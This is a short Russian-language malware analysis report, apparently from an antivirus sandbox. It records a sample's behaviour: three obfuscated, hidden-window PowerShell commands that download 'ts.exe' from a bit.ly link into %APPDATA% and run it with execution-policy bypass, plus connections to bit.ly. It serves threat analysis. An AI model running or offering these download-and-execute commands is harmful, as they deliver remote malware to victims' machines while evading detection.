Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://bit.ly/3djeHvo','ts.exe')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Start-Sleep 20; Move-Item "ts.exe" -Destination "${enV`:appdata}"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/ts.exe')
Сетевая активность
Подключается к
- 'bi#.ly':443
TCP
- 'bi#.ly':443
UDP
- DNS ASK bi#.ly
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://bit.ly/3djeHvo','ts.exe')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Start-Sleep 20; Move-Item "ts.exe" -Destination "${enV`:appdata}"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/ts.exe')' (со скрытым окном)
